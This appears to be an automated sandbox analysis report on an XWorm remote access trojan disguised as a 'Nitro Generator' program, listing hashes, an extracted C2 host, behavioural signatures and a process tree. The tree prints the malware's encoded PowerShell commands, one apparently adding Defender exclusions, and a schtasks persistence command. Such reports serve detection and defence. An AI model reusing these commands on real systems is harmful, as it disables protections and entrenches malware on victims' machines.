Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    21-06-2024 23:03

General

  • Target

    Nitro Generator v1.exe

  • Size

    225KB

  • MD5

    a2da88430b3dd46d547cd75126ecee69

  • SHA1

    c41229461c4b6ddc695c8a01940e76a0f0b930b7

  • SHA256

    c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12

  • SHA512

    c3dcfa26d3c2a10f5ac58cd22f2c5bf5fbb986c11a43a547e0ea1f4ac016819de46bfadab6d111e83c2c9f572285a7f3ea4e275944ef7c16bf98426283fac859

  • SSDEEP

    3072:LVAzYZD5kDzAgXKnj8meFDm8Zk5WFEw2zlXPcARAK4Mtx1Nnva/Vk5uAOcU3aQg7:LVBZ+DsfnwmlMkQEaARV4MT6dY9Mg59

Malware Config

Extracted

Family

xworm

C2

runderscore00-25851.portmap.host:25851

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe
    "C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2912
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2536
    • C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
      "C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
      2⤵
      • Executes dropped EXE
      PID:2376
    • C:\Windows\Nitro Generator.exe
      "C:\Windows\Nitro Generator.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2072
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {8DBD58ED-AD28-40D6-90C3-D7053C731BEB} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:356
    • C:\ProgramData\svchost
      C:\ProgramData\svchost
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:300
    • C:\ProgramData\svchost
      C:\ProgramData\svchost
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1652

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    180792358c1f1b6cb9af0cecfa83087c

    SHA1

    91d3e9e6c9f5050b910de3588bf2ef027c465eaf

    SHA256

    1134edb33019281abee55820bb499cf9263696cff06282507336305ff50b55bb

    SHA512

    463d1ddd0ec3065a05d6fe52835c59242862e29c183ec14c942daf6785d1c667bd85cb9b57f4198f80f7882b27b7d480e0eb56f78350ba3283b949fda65e2c40

  • C:\Windows\Nitro Generator.exe

    Filesize

    77KB

    MD5

    8bbf53c41f2625a3c4e608ad13cb2c55

    SHA1

    3335287d42f6e674eb1d4465949e02d262bb8391

    SHA256

    ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299

    SHA512

    9c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \Users\Admin\AppData\Local\Temp\NitroGen.exe

    Filesize

    139KB

    MD5

    16c70bc93e70148d8e32877fb69c5163

    SHA1

    9997631ad75d02297a4c7a06c37db115a0a1c0ec

    SHA256

    b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d

    SHA512

    02242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd

  • memory/300-35-0x0000000001000000-0x000000000101A000-memory.dmp

    Filesize

    104KB

  • memory/1652-38-0x0000000001230000-0x000000000124A000-memory.dmp

    Filesize

    104KB

  • memory/2504-26-0x0000000000EC0000-0x0000000000EDA000-memory.dmp

    Filesize

    104KB

  • memory/2888-9-0x0000000002960000-0x0000000002968000-memory.dmp

    Filesize

    32KB

  • memory/2888-8-0x000000001B840000-0x000000001BB22000-memory.dmp

    Filesize

    2.9MB

  • memory/2888-7-0x0000000002D00000-0x0000000002D80000-memory.dmp

    Filesize

    512KB

  • memory/2912-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmp

    Filesize

    4KB

  • memory/2912-27-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2912-4-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp

    Filesize

    9.9MB

  • memory/2912-1-0x0000000000F40000-0x0000000000F7E000-memory.dmp

    Filesize

    248KB